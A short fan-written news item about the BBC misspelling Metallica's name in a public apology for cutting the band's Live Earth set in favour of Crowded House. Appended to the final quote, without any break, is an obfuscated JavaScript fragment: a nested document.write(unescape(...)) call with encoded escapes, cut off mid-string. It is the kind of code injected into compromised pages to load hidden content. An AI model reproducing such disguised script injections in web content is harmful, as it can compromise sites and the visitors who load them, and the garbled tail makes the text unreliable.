The BBC outraged Metallica fans even further having spelled the band's name wrong during a public apology.
Fans of the metal gods - and yes, I am one - were further miffed when the BBC, not satisfied with having to publicly apologise to Metallica fans for cutting their Live Earth coverage mid-song in favour of Crowded House live in Sydney, then proceeded to spell the band's name wrong during its apology.
According to the Guardian, the Beeb is thought to have said: "The decision was not taken out of 'prejudice about heavy metal music or any other music'.
"We received complaints from some viewers that the Metalica [sic] set was not shown in full.
"This was a global event and we were keen to reflect the other concerts as well as the one in UK.
"We took editorial decisions in advance and on the day, about the times and places we would do that."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
